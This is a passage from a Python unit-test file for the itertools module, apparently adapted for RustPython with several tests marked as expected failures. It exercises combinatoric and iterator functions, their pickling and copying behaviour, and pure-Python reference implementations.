return x%2==0
def isOdd(x):
'Test predicate'
return x%2==1
def tupleize(*args):
return args
def irange(n):
for i in range(n):
yield i
class StopNow:
'Class emulating an empty iterable.'
def __iter__(self):
return self
def __next__(self):
raise StopIteration
def take(n, seq):
'Convenience function for partially consuming a long or infinite iterable'
return list(islice(seq, n))
def prod(iterable):
return reduce(operator.mul, iterable, 1)
def fact(n):
'Factorial'
return prod(range(1, n+1))
# root level methods for pickling ability
def testR(r):
return r[0]
def testR2(r):
return r[2]
def underten(x):
return x<10
picklecopiers = [lambda s, proto=proto: pickle.loads(pickle.dumps(s, proto))
for proto in range(pickle.HIGHEST_PROTOCOL + 1)]
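# picklecopiers above builds one "copy an iterator by pickling it" callable
# per pickle protocol.  The helper below is an illustrative standalone
# equivalent for a single protocol (not part of the original test suite).
def _demo_pickle_roundtrip(iterator, proto=pickle.HIGHEST_PROTOCOL):
    # Serialize the (possibly partially consumed) iterator and rebuild an
    # independent copy that resumes from the same position.
    return pickle.loads(pickle.dumps(iterator, proto))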
class TestBasicOps(unittest.TestCase):
def pickletest(self, protocol, it, stop=4, take=1, compare=None):
"""Test that an iterator is the same after pickling, also when part-consumed"""
def expand(it, i=0):
# Recursively expand iterables, within sensible bounds
if i > 10:
raise RuntimeError("infinite recursion encountered")
if isinstance(it, str):
return it
try:
l = list(islice(it, stop))
except TypeError:
return it # can't expand it
return [expand(e, i+1) for e in l]
# Test the initial copy against the original
dump = pickle.dumps(it, protocol)
i2 = pickle.loads(dump)
self.assertEqual(type(it), type(i2))
a, b = expand(it), expand(i2)
self.assertEqual(a, b)
if compare:
c = expand(compare)
self.assertEqual(a, c)
# Take from the copy, and create another copy and compare them.
i3 = pickle.loads(dump)
took = 0
try:
for i in range(take):
next(i3)
took += 1
except StopIteration:
pass #in case there is less data than 'take'
dump = pickle.dumps(i3, protocol)
i4 = pickle.loads(dump)
a, b = expand(i3), expand(i4)
self.assertEqual(a, b)
if compare:
c = expand(compare[took:])
self.assertEqual(a, c)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_accumulate(self):
self.assertEqual(list(accumulate(range(10))), # one positional arg
[0, 1, 3, 6, 10, 15, 21, 28, 36, 45])
self.assertEqual(list(accumulate(iterable=range(10))), # kw arg
[0, 1, 3, 6, 10, 15, 21, 28, 36, 45])
for typ in int, complex, Decimal, Fraction: # multiple types
self.assertEqual(
list(accumulate(map(typ, range(10)))),
list(map(typ, [0, 1, 3, 6, 10, 15, 21, 28, 36, 45])))
self.assertEqual(list(accumulate('abc')), ['a', 'ab', 'abc']) # works with non-numeric
self.assertEqual(list(accumulate([])), []) # empty iterable
self.assertEqual(list(accumulate([7])), [7]) # iterable of length one
self.assertRaises(TypeError, accumulate, range(10), 5, 6) # too many args
self.assertRaises(TypeError, accumulate) # too few args
self.assertRaises(TypeError, accumulate, x=range(10)) # unexpected kwd arg
self.assertRaises(TypeError, list, accumulate([1, []])) # args that don't add
s = [2, 8, 9, 5, 7, 0, 3, 4, 1, 6]
self.assertEqual(list(accumulate(s, min)),
[2, 2, 2, 2, 2, 0, 0, 0, 0, 0])
self.assertEqual(list(accumulate(s, max)),
[2, 8, 9, 9, 9, 9, 9, 9, 9, 9])
self.assertEqual(list(accumulate(s, operator.mul)),
[2, 16, 144, 720, 5040, 0, 0, 0, 0, 0])
with self.assertRaises(TypeError):
list(accumulate(s, chr)) # unary-operation
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, accumulate(range(10))) # test pickling
self.pickletest(proto, accumulate(range(10), initial=7))
self.assertEqual(list(accumulate([10, 5, 1], initial=None)), [10, 15, 16])
self.assertEqual(list(accumulate([10, 5, 1], initial=100)), [100, 110, 115, 116])
self.assertEqual(list(accumulate([], initial=100)), [100])
with self.assertRaises(TypeError):
list(accumulate([10, 20], 100))
def test_chain(self):
def chain2(*iterables):
'Pure python version in the docs'
for it in iterables:
for element in it:
yield element
for c in (chain, chain2):
self.assertEqual(list(c('abc', 'def')), list('abcdef'))
self.assertEqual(list(c('abc')), list('abc'))
self.assertEqual(list(c('')), [])
self.assertEqual(take(4, c('abc', 'def')), list('abcd'))
self.assertRaises(TypeError, list,c(2, 3))
def test_chain_from_iterable(self):
self.assertEqual(list(chain.from_iterable(['abc', 'def'])), list('abcdef'))
self.assertEqual(list(chain.from_iterable(['abc'])), list('abc'))
self.assertEqual(list(chain.from_iterable([''])), [])
self.assertEqual(take(4, chain.from_iterable(['abc', 'def'])), list('abcd'))
self.assertRaises(TypeError, list, chain.from_iterable([2, 3]))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_chain_reducible(self):
for oper in [copy.deepcopy] + picklecopiers:
it = chain('abc', 'def')
self.assertEqual(list(oper(it)), list('abcdef'))
self.assertEqual(next(it), 'a')
self.assertEqual(list(oper(it)), list('bcdef'))
self.assertEqual(list(oper(chain(''))), [])
self.assertEqual(take(4, oper(chain('abc', 'def'))), list('abcd'))
self.assertRaises(TypeError, list, oper(chain(2, 3)))
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, chain('abc', 'def'), compare=list('abcdef'))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_chain_setstate(self):
self.assertRaises(TypeError, chain().__setstate__, ())
self.assertRaises(TypeError, chain().__setstate__, [])
self.assertRaises(TypeError, chain().__setstate__, 0)
self.assertRaises(TypeError, chain().__setstate__, ([],))
self.assertRaises(TypeError, chain().__setstate__, (iter([]), []))
it = chain()
it.__setstate__((iter(['abc', 'def']),))
self.assertEqual(list(it), ['a', 'b', 'c', 'd', 'e', 'f'])
it = chain()
it.__setstate__((iter(['abc', 'def']), iter(['ghi'])))
self.assertEqual(list(it), ['ghi', 'a', 'b', 'c', 'd', 'e', 'f'])
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_combinations(self):
self.assertRaises(TypeError, combinations, 'abc') # missing r argument
self.assertRaises(TypeError, combinations, 'abc', 2, 1) # too many arguments
self.assertRaises(TypeError, combinations, None) # pool is not iterable
self.assertRaises(ValueError, combinations, 'abc', -2) # r is negative
for op in [lambda a:a] + picklecopiers:
self.assertEqual(list(op(combinations('abc', 32))), []) # r > n
self.assertEqual(list(op(combinations('ABCD', 2))),
[('A','B'), ('A','C'), ('A','D'), ('B','C'), ('B','D'), ('C','D')])
testIntermediate = combinations('ABCD', 2)
next(testIntermediate)
self.assertEqual(list(op(testIntermediate)),
[('A','C'), ('A','D'), ('B','C'), ('B','D'), ('C','D')])
self.assertEqual(list(op(combinations(range(4), 3))),
[(0,1,2), (0,1,3), (0,2,3), (1,2,3)])
testIntermediate = combinations(range(4), 3)
next(testIntermediate)
self.assertEqual(list(op(testIntermediate)),
[(0,1,3), (0,2,3), (1,2,3)])
def combinations1(iterable, r):
'Pure python version shown in the docs'
pool = tuple(iterable)
n = len(pool)
if r > n:
return
indices = list(range(r))
yield tuple(pool[i] for i in indices)
while 1:
for i in reversed(range(r)):
if indices[i] != i + n - r:
break
else:
return
indices[i] += 1
for j in range(i+1, r):
indices[j] = indices[j-1] + 1
yield tuple(pool[i] for i in indices)
def combinations2(iterable, r):
'Pure python version shown in the docs'
pool = tuple(iterable)
n = len(pool)
for indices in permutations(range(n), r):
if sorted(indices) == list(indices):
yield tuple(pool[i] for i in indices)
def combinations3(iterable, r):
'Pure python version from cwr()'
pool = tuple(iterable)
n = len(pool)
for indices in combinations_with_replacement(range(n), r):
if len(set(indices)) == r:
yield tuple(pool[i] for i in indices)
for n in range(7):
values = [5*x-12 for x in range(n)]
for r in range(n+2):
result = list(combinations(values, r))
self.assertEqual(len(result), 0 if r>n else fact(n) / fact(r) / fact(n-r)) # right number of combs
self.assertEqual(len(result), len(set(result))) # no repeats
self.assertEqual(result, sorted(result)) # lexicographic order
for c in result:
self.assertEqual(len(c), r) # r-length combinations
self.assertEqual(len(set(c)), r) # no duplicate elements
self.assertEqual(list(c), sorted(c)) # keep original ordering
self.assertTrue(all(e in values for e in c)) # elements taken from input iterable
self.assertEqual(list(c),
[e for e in values if e in c]) # comb is a subsequence of the input iterable
self.assertEqual(result, list(combinations1(values, r))) # matches first pure python version
self.assertEqual(result, list(combinations2(values, r))) # matches second pure python version
self.assertEqual(result, list(combinations3(values, r))) # matches third pure python version
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, combinations(values, r)) # test pickling
@support.bigaddrspacetest
def test_combinations_overflow(self):
with self.assertRaises((OverflowError, MemoryError)):
combinations("AA", 2**29)
# Test implementation detail: tuple re-use
@support.impl_detail("tuple reuse is specific to CPython")
def test_combinations_tuple_reuse(self):
self.assertEqual(len(set(map(id, combinations('abcde', 3)))), 1)
self.assertNotEqual(len(set(map(id, list(combinations('abcde', 3))))), 1)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_combinations_with_replacement(self):
cwr = combinations_with_replacement
self.assertRaises(TypeError, cwr, 'abc') # missing r argument
self.assertRaises(TypeError, cwr, 'abc', 2, 1) # too many arguments
self.assertRaises(TypeError, cwr, None) # pool is not iterable
self.assertRaises(ValueError, cwr, 'abc', -2) # r is negative
for op in [lambda a:a] + picklecopiers:
self.assertEqual(list(op(cwr('ABC', 2))),
[('A','A'), ('A','B'), ('A','C'), ('B','B'), ('B','C'), ('C','C')])
testIntermediate = cwr('ABC', 2)
next(testIntermediate)
self.assertEqual(list(op(testIntermediate)),
[('A','B'), ('A','C'), ('B','B'), ('B','C'), ('C','C')])
def cwr1(iterable, r):
'Pure python version shown in the docs'
# number of items returned: (n+r-1)! / r! / (n-1)! when n>0
pool = tuple(iterable)
n = len(pool)
if not n and r:
return
indices = [0] * r
yield tuple(pool[i] for i in indices)
while 1:
for i in reversed(range(r)):
if indices[i] != n - 1:
break
else:
return
indices[i:] = [indices[i] + 1] * (r - i)
yield tuple(pool[i] for i in indices)
def cwr2(iterable, r):
'Pure python version shown in the docs'
pool = tuple(iterable)
n = len(pool)
for indices in product(range(n), repeat=r):
if sorted(indices) == list(indices):
yield tuple(pool[i] for i in indices)
def numcombs(n, r):
if not n:
return 0 if r else 1
return fact(n+r-1) / fact(r)/ fact(n-1)
for n in range(7):
values = [5*x-12 for x in range(n)]
for r in range(n+2):
result = list(cwr(values, r))
self.assertEqual(len(result), numcombs(n, r)) # right number of combs
self.assertEqual(len(result), len(set(result))) # no repeats
self.assertEqual(result, sorted(result)) # lexicographic order
regular_combs = list(combinations(values, r)) # compare to combs without replacement
if n == 0 or r <= 1:
self.assertEqual(result, regular_combs) # cases that should be identical
else:
self.assertTrue(set(result) >= set(regular_combs)) # rest should be supersets of regular combs
for c in result:
self.assertEqual(len(c), r) # r-length combinations
noruns = [k for k,v in groupby(c)] # combo without consecutive repeats
self.assertEqual(len(noruns), len(set(noruns))) # no repeats other than consecutive
self.assertEqual(list(c), sorted(c)) # keep original ordering
self.assertTrue(all(e in values for e in c)) # elements taken from input iterable
self.assertEqual(noruns,
[e for e in values if e in c]) # comb is a subsequence of the input iterable
self.assertEqual(result, list(cwr1(values, r))) # matches first pure python version
self.assertEqual(result, list(cwr2(values, r))) # matches second pure python version
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, cwr(values,r)) # test pickling
@support.bigaddrspacetest
def test_combinations_with_replacement_overflow(self):
with self.assertRaises((OverflowError, MemoryError)):
combinations_with_replacement("AA", 2**30)
# Test implementation detail: tuple re-use
@support.impl_detail("tuple reuse is specific to CPython")
def test_combinations_with_replacement_tuple_reuse(self):
cwr = combinations_with_replacement
self.assertEqual(len(set(map(id, cwr('abcde', 3)))), 1)
self.assertNotEqual(len(set(map(id, list(cwr('abcde', 3))))), 1)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_permutations(self):
self.assertRaises(TypeError, permutations) # too few arguments
self.assertRaises(TypeError, permutations, 'abc', 2, 1) # too many arguments
self.assertRaises(TypeError, permutations, None) # pool is not iterable
self.assertRaises(ValueError, permutations, 'abc', -2) # r is negative
self.assertEqual(list(permutations('abc', 32)), []) # r > n
self.assertRaises(TypeError, permutations, 'abc', 's') # r is not an int or None
self.assertEqual(list(permutations(range(3), 2)),
[(0,1), (0,2), (1,0), (1,2), (2,0), (2,1)])
def permutations1(iterable, r=None):
'Pure python version shown in the docs'
pool = tuple(iterable)
n = len(pool)
r = n if r is None else r
if r > n:
return
indices = list(range(n))
cycles = list(range(n-r+1, n+1))[::-1]
yield tuple(pool[i] for i in indices[:r])
while n:
for i in reversed(range(r)):
cycles[i] -= 1
if cycles[i] == 0:
indices[i:] = indices[i+1:] + indices[i:i+1]
cycles[i] = n - i
else:
j = cycles[i]
indices[i], indices[-j] = indices[-j], indices[i]
yield tuple(pool[i] for i in indices[:r])
break
else:
return
def permutations2(iterable, r=None):
'Pure python version shown in the docs'
pool = tuple(iterable)
n = len(pool)
r = n if r is None else r
for indices in product(range(n), repeat=r):
if len(set(indices)) == r:
yield tuple(pool[i] for i in indices)
for n in range(7):
values = [5*x-12 for x in range(n)]
for r in range(n+2):
result = list(permutations(values, r))
self.assertEqual(len(result), 0 if r>n else fact(n) / fact(n-r)) # right number of perms
self.assertEqual(len(result), len(set(result))) # no repeats
self.assertEqual(result, sorted(result)) # lexicographic order
for p in result:
self.assertEqual(len(p), r) # r-length permutations
self.assertEqual(len(set(p)), r) # no duplicate elements
self.assertTrue(all(e in values for e in p)) # elements taken from input iterable
self.assertEqual(result, list(permutations1(values, r))) # matches first pure python version
self.assertEqual(result, list(permutations2(values, r))) # matches second pure python version
if r == n:
self.assertEqual(result, list(permutations(values, None))) # test r as None
self.assertEqual(result, list(permutations(values))) # test default r
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, permutations(values, r)) # test pickling
@support.bigaddrspacetest
def test_permutations_overflow(self):
with self.assertRaises((OverflowError, MemoryError)):
permutations("A", 2**30)
@support.impl_detail("tuple reuse is specific to CPython")
def test_permutations_tuple_reuse(self):
self.assertEqual(len(set(map(id, permutations('abcde', 3)))), 1)
self.assertNotEqual(len(set(map(id, list(permutations('abcde', 3))))), 1)
def test_combinatorics(self):
# Test relationships between product(), permutations(),
# combinations() and combinations_with_replacement().
for n in range(6):
s = 'ABCDEFG'[:n]
for r in range(8):
prod = list(product(s, repeat=r))
cwr = list(combinations_with_replacement(s, r))
perm = list(permutations(s, r))
comb = list(combinations(s, r))
# Check size
self.assertEqual(len(prod), n**r)
self.assertEqual(len(cwr), (fact(n+r-1) / fact(r)/ fact(n-1)) if n else (not r))
self.assertEqual(len(perm), 0 if r>n else fact(n) / fact(n-r))
self.assertEqual(len(comb), 0 if r>n else fact(n) / fact(r) / fact(n-r))
# Check lexicographic order without repeated tuples
self.assertEqual(prod, sorted(set(prod)))
self.assertEqual(cwr, sorted(set(cwr)))
self.assertEqual(perm, sorted(set(perm)))
self.assertEqual(comb, sorted(set(comb)))
# Check interrelationships
self.assertEqual(cwr, [t for t in prod if sorted(t)==list(t)]) # cwr: prods which are sorted
self.assertEqual(perm, [t for t in prod if len(set(t))==r]) # perm: prods with no dups
self.assertEqual(comb, [t for t in perm if sorted(t)==list(t)]) # comb: perms that are sorted
self.assertEqual(comb, [t for t in cwr if len(set(t))==r]) # comb: cwrs without dups
self.assertEqual(comb, list(filter(set(cwr).__contains__, perm))) # comb: perm that is a cwr
self.assertEqual(comb, list(filter(set(perm).__contains__, cwr))) # comb: cwr that is a perm
self.assertEqual(comb, sorted(set(cwr) & set(perm))) # comb: both a cwr and a perm
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_compress(self):
self.assertEqual(list(compress(data='ABCDEF', selectors=[1,0,1,0,1,1])), list('ACEF'))
self.assertEqual(list(compress('ABCDEF', [1,0,1,0,1,1])), list('ACEF'))
self.assertEqual(list(compress('ABCDEF', [0,0,0,0,0,0])), list(''))
self.assertEqual(list(compress('ABCDEF', [1,1,1,1,1,1])), list('ABCDEF'))
self.assertEqual(list(compress('ABCDEF', [1,0,1])), list('AC'))
self.assertEqual(list(compress('ABC', [0,1,1,1,1,1])), list('BC'))
n = 10000
data = chain.from_iterable(repeat(range(6), n))
selectors = chain.from_iterable(repeat((0, 1)))
self.assertEqual(list(compress(data, selectors)), [1,3,5] * n)
self.assertRaises(TypeError, compress, None, range(6)) # 1st arg not iterable
self.assertRaises(TypeError, compress, range(6), None) # 2nd arg not iterable
self.assertRaises(TypeError, compress, range(6)) # too few args
self.assertRaises(TypeError, compress, range(6), None) # too many args
# check copy, deepcopy, pickle
for op in [lambda a:copy.copy(a), lambda a:copy.deepcopy(a)] + picklecopiers:
for data, selectors, result1, result2 in [
('ABCDEF', [1,0,1,0,1,1], 'ACEF', 'CEF'),
('ABCDEF', [0,0,0,0,0,0], '', ''),
('ABCDEF', [1,1,1,1,1,1], 'ABCDEF', 'BCDEF'),
('ABCDEF', [1,0,1], 'AC', 'C'),
('ABC', [0,1,1,1,1,1], 'BC', 'C'),
]:
self.assertEqual(list(op(compress(data=data, selectors=selectors))), list(result1))
self.assertEqual(list(op(compress(data, selectors))), list(result1))
testIntermediate = compress(data, selectors)
if result1:
next(testIntermediate)
self.assertEqual(list(op(testIntermediate)), list(result2))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_count(self):
self.assertEqual(lzip('abc',count()), [('a', 0), ('b', 1), ('c', 2)])
self.assertEqual(lzip('abc',count(3)), [('a', 3), ('b', 4), ('c', 5)])
self.assertEqual(take(2, lzip('abc',count(3))), [('a', 3), ('b', 4)])
self.assertEqual(take(2, zip('abc',count(-1))), [('a', -1), ('b', 0)])
self.assertEqual(take(2, zip('abc',count(-3))), [('a', -3), ('b', -2)])
self.assertRaises(TypeError, count, 2, 3, 4)
self.assertRaises(TypeError, count, 'a')
self.assertEqual(take(10, count(maxsize-5)),
list(range(maxsize-5, maxsize+5)))
self.assertEqual(take(10, count(-maxsize-5)),
list(range(-maxsize-5, -maxsize+5)))
self.assertEqual(take(3, count(3.25)), [3.25, 4.25, 5.25])
self.assertEqual(take(3, count(3.25-4j)), [3.25-4j, 4.25-4j, 5.25-4j])
self.assertEqual(take(3, count(Decimal('1.1'))),
[Decimal('1.1'), Decimal('2.1'), Decimal('3.1')])
self.assertEqual(take(3, count(Fraction(2, 3))),
[Fraction(2, 3), Fraction(5, 3), Fraction(8, 3)])
BIGINT = 1<<1000
self.assertEqual(take(3, count(BIGINT)), [BIGINT, BIGINT+1, BIGINT+2])
c = count(3)
self.assertEqual(repr(c), 'count(3)')
next(c)
self.assertEqual(repr(c), 'count(4)')
c = count(-9)
self.assertEqual(repr(c), 'count(-9)')
next(c)
self.assertEqual(next(c), -8)
self.assertEqual(repr(count(10.25)), 'count(10.25)')
self.assertEqual(repr(count(10.0)), 'count(10.0)')
self.assertEqual(type(next(count(10.0))), float)
for i in (-sys.maxsize-5, -sys.maxsize+5 ,-10, -1, 0, 10, sys.maxsize-5, sys.maxsize+5):
# Test repr
r1 = repr(count(i))
r2 = 'count(%r)'.__mod__(i)
self.assertEqual(r1, r2)
# check copy, deepcopy, pickle
for value in -3, 3, maxsize-5, maxsize+5:
c = count(value)
self.assertEqual(next(copy.copy(c)), value)
self.assertEqual(next(copy.deepcopy(c)), value)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, count(value))
# check proper internal error handling for large 'step' sizes
count(1, maxsize+5); sys.exc_info()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_count_with_stride(self):
self.assertEqual(lzip('abc',count(2,3)), [('a', 2), ('b', 5), ('c', 8)])
self.assertEqual(lzip('abc',count(start=2,step=3)),
[('a', 2), ('b', 5), ('c', 8)])
self.assertEqual(lzip('abc',count(step=-1)),
[('a', 0), ('b', -1), ('c', -2)])
self.assertRaises(TypeError, count, 'a', 'b')
self.assertEqual(lzip('abc',count(2,0)), [('a', 2), ('b', 2), ('c', 2)])
self.assertEqual(lzip('abc',count(2,1)), [('a', 2), ('b', 3), ('c', 4)])
self.assertEqual(lzip('abc',count(2,3)), [('a', 2), ('b', 5), ('c', 8)])
self.assertEqual(take(20, count(maxsize-15, 3)), take(20, range(maxsize-15, maxsize+100, 3)))
self.assertEqual(take(20, count(-maxsize-15, 3)), take(20, range(-maxsize-15,-maxsize+100, 3)))
self.assertEqual(take(3, count(10, maxsize+5)),
list(range(10, 10+3*(maxsize+5), maxsize+5)))
self.assertEqual(take(3, count(2, 1.25)), [2, 3.25, 4.5])
self.assertEqual(take(3, count(2, 3.25-4j)), [2, 5.25-4j, 8.5-8j])
self.assertEqual(take(3, count(Decimal('1.1'), Decimal('.1'))),
[Decimal('1.1'), Decimal('1.2'), Decimal('1.3')])
self.assertEqual(take(3, count(Fraction(2,3), Fraction(1,7))),
[Fraction(2,3), Fraction(17,21), Fraction(20,21)])
BIGINT = 1<<1000
self.assertEqual(take(3, count(step=BIGINT)), [0, BIGINT, 2*BIGINT])
self.assertEqual(repr(take(3, count(10, 2.5))), repr([10, 12.5, 15.0]))
c = count(3, 5)
self.assertEqual(repr(c), 'count(3, 5)')
next(c)
self.assertEqual(repr(c), 'count(8, 5)')
c = count(-9, 0)
self.assertEqual(repr(c), 'count(-9, 0)')
next(c)
self.assertEqual(repr(c), 'count(-9, 0)')
c = count(-9, -3)
self.assertEqual(repr(c), 'count(-9, -3)')
next(c)
self.assertEqual(repr(c), 'count(-12, -3)')
self.assertEqual(repr(c), 'count(-12, -3)')
self.assertEqual(repr(count(10.5, 1.25)), 'count(10.5, 1.25)')
self.assertEqual(repr(count(10.5, 1)), 'count(10.5)') # suppress step=1 when it's an int
self.assertEqual(repr(count(10.5, 1.00)), 'count(10.5, 1.0)') # do show float values like 1.0
self.assertEqual(repr(count(10, 1.00)), 'count(10, 1.0)')
c = count(10, 1.0)
self.assertEqual(type(next(c)), int)
self.assertEqual(type(next(c)), float)
for i in (-sys.maxsize-5, -sys.maxsize+5 ,-10, -1, 0, 10, sys.maxsize-5, sys.maxsize+5):
for j in (-sys.maxsize-5, -sys.maxsize+5 ,-10, -1, 0, 1, 10, sys.maxsize-5, sys.maxsize+5):
# Test repr
r1 = repr(count(i, j))
if j == 1:
r2 = ('count(%r)' % i)
else:
r2 = ('count(%r, %r)' % (i, j))
self.assertEqual(r1, r2)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, count(i, j))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_cycle(self):
self.assertEqual(take(10, cycle('abc')), list('abcabcabca'))
self.assertEqual(list(cycle('')), [])
self.assertRaises(TypeError, cycle)
self.assertRaises(TypeError, cycle, 5)
self.assertEqual(list(islice(cycle(gen3()),10)), [0,1,2,0,1,2,0,1,2,0])
# check copy, deepcopy, pickle
c = cycle('abc')
self.assertEqual(next(c), 'a')
#simple copy currently not supported, because __reduce__ returns
#an internal iterator
#self.assertEqual(take(10, copy.copy(c)), list('bcabcabcab'))
self.assertEqual(take(10, copy.deepcopy(c)), list('bcabcabcab'))
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertEqual(take(10, pickle.loads(pickle.dumps(c, proto))),
list('bcabcabcab'))
next(c)
self.assertEqual(take(10, pickle.loads(pickle.dumps(c, proto))),
list('cabcabcabc'))
next(c)
next(c)
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
self.pickletest(proto, cycle('abc'))
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
# test with partial consumed input iterable
it = iter('abcde')
c = cycle(it)
_ = [next(c) for i in range(2)] # consume 2 of 5 inputs
p = pickle.dumps(c, proto)
d = pickle.loads(p) # rebuild the cycle object
self.assertEqual(take(20, d), list('cdeabcdeabcdeabcdeab'))
# test with completely consumed input iterable
it = iter('abcde')
c = cycle(it)
_ = [next(c) for i in range(7)] # consume 7 of 5 inputs
p = pickle.dumps(c, proto)
d = pickle.loads(p) # rebuild the cycle object
self.assertEqual(take(20, d), list('cdeabcdeabcdeabcdeab'))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_cycle_setstate(self):
# Verify both modes for restoring state
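# In both modes the state passed to __setstate__ is a 2-tuple
# (list_of_saved_elements, flag): with flag 0 the saved list is replayed only
# after the wrapped iterator is exhausted, with flag 1 the saved list already
# holds every element and the iterator only supplies the rest of the current pass.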
# Mode 0 is efficient. It uses an incompletely consumed input
# iterator to build a cycle object and then passes in state with
# a list of previously consumed values. There is no data
# overlap between the two.
c = cycle('defg')
c.__setstate__((list('abc'), 0))
self.assertEqual(take(20, c), list('defgabcdefgabcdefgab'))
# Mode 1 is inefficient. It starts with a cycle object built
# from an iterator over the remaining elements in a partial
# cycle and then passes in state with all of the previously
# seen values (this overlaps values included in the iterator).
c = cycle('defg')
c.__setstate__((list('abcdefg'), 1))
self.assertEqual(take(20, c), list('defgabcdefgabcdefgab'))
# The first argument to setstate needs to be a tuple
with self.assertRaises(TypeError):
cycle('defg').__setstate__([list('abcdefg'), 0])
# The first argument in the setstate tuple must be a list
with self.assertRaises(TypeError):
c = cycle('defg')
c.__setstate__((tuple('defg'), 0))
take(20, c)
# The second argument in the setstate tuple must be an int
with self.assertRaises(TypeError):
cycle('defg').__setstate__((list('abcdefg'), 'x'))
self.assertRaises(TypeError, cycle('').__setstate__, ())
self.assertRaises(TypeError, cycle('').__setstate__, ([],))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_groupby(self):
# Check whether it accepts arguments correctly
self.assertEqual([], list(groupby([])))
self.assertEqual([], list(groupby([], key=id)))
self.assertRaises(TypeError, list, groupby('abc', []))
self.assertRaises(TypeError, groupby, None)
self.assertRaises(TypeError, groupby, 'abc', lambda x:x, 10)
# Check normal input
s = [(0, 10, 20), (0, 11,21), (0,12,21), (1,13,21), (1,14,22),
(2,15,22), (3,16,23), (3,17,23)]
dup = []
for k, g in groupby(s, lambda r:r[0]):
for elem in g:
self.assertEqual(k, elem[0])
dup.append(elem)
self.assertEqual(s, dup)
# Check normal pickled
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
dup = []
for k, g in pickle.loads(pickle.dumps(groupby(s, testR), proto)):
for elem in g:
self.assertEqual(k, elem[0])
dup.append(elem)
self.assertEqual(s, dup)
# Check nested case
dup = []
for k, g in groupby(s, testR):
for ik, ig in groupby(g, testR2):
for elem in ig:
self.assertEqual(k, elem[0])
self.assertEqual(ik, elem[2])
dup.append(elem)
self.assertEqual(s, dup)
# Check nested and pickled
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
dup = []
for k, g in pickle.loads(pickle.dumps(groupby(s, testR), proto)):
for ik, ig in pickle.loads(pickle.dumps(groupby(g, testR2), proto)):
for elem in ig:
self.assertEqual(k, elem[0])
self.assertEqual(ik, elem[2])
dup.append(elem)
self.assertEqual(s, dup)
# Check case where inner iterator is not used
keys = [k for k, g in groupby(s, testR)]
expectedkeys = set([r[0] for r in s])
self.assertEqual(set(keys), expectedkeys)
self.assertEqual(len(keys), len(expectedkeys))
# Check case where inner iterator is used after advancing the groupby
# iterator
s = list(zip('AABBBAAAA', range(9)))
it = groupby(s, testR)
_, g1 = next(it)
_, g2 = next(it)
_, g3 = next(it)
self.assertEqual(list(g1), [])
self.assertEqual(list(g2), [])
self.assertEqual(next(g3), ('A', 5))
list(it) # exhaust the groupby iterator
self.assertEqual(list(g3), [])
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
it = groupby(s, testR)
_, g = next(it)
next(it)
next(it)
self.assertEqual(list(pickle.loads(pickle.dumps(g, proto))), [])
# Exercise pipes and filters style
s = 'abracadabra'
# sort s | uniq
r = [k for k, g in groupby(sorted(s))]
self.assertEqual(r, ['a', 'b', 'c', 'd', 'r'])
# sort s | uniq -d
r = [k for k, g in groupby(sorted(s)) if list(islice(g,1,2))]
self.assertEqual(r, ['a', 'b', 'r'])
# sort s | uniq -c
r = [(len(list(g)), k) for k, g in groupby(sorted(s))]
self.assertEqual(r, [(5, 'a'), (2, 'b'), (1, 'c'), (1, 'd'), (2, 'r')])
# sort s | uniq -c | sort -rn | head -3
r = sorted([(len(list(g)) , k) for k, g in groupby(sorted(s))], reverse=True)[:3]
self.assertEqual(r, [(5, 'a'), (2, 'r'), (2, 'b')])
# iter.__next__ failure
class ExpectedError(Exception):
pass
def delayed_raise(n=0):
for i in range(n):
yield 'yo'
raise ExpectedError
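# gulp() drains every group produced by groupby so that any error raised while
# iterating (from the source iterator, the key function, or __eq__) propagates out.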
def gulp(iterable, keyp=None, func=list):
return [func(g) for k, g in groupby(iterable, keyp)]
# iter.__next__ failure on outer object
self.assertRaises(ExpectedError, gulp, delayed_raise(0))
# iter.__next__ failure on inner object
self.assertRaises(ExpectedError, gulp, delayed_raise(1))
# __eq__ failure
class DummyCmp:
def __eq__(self, dst):
raise ExpectedError
s = [DummyCmp(), DummyCmp(), None]
# __eq__ failure on outer object
self.assertRaises(ExpectedError, gulp, s, func=id)
# __eq__ failure on inner object
self.assertRaises(ExpectedError, gulp, s)
# keyfunc failure
def keyfunc(obj):
if keyfunc.skip > 0:
keyfunc.skip -= 1
return obj
else:
raise ExpectedError
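# keyfunc succeeds for the first `skip` calls and then raises, so the checks
# below can choose whether the failure happens while keying the first (outer)
# element or a later (inner) one.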
# keyfunc failure on outer object
keyfunc.skip = 0
self.assertRaises(ExpectedError, gulp, [None], keyfunc)
keyfunc.skip = 1
self.assertRaises(ExpectedError, gulp, [None, None], keyfunc)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_filter(self):
self.assertEqual(list(filter(isEven, range(6))), [0,2,4])
self.assertEqual(list(filter(None, [0,1,0,2,0])), [1,2])
self.assertEqual(list(filter(bool, [0,1,0,2,0])), [1,2])
self.assertEqual(take(4, filter(isEven, count())), [0,2,4,6])
self.assertRaises(TypeError, filter)
self.assertRaises(TypeError, filter, lambda x:x)
self.assertRaises(TypeError, filter, lambda x:x, range(6), 7)
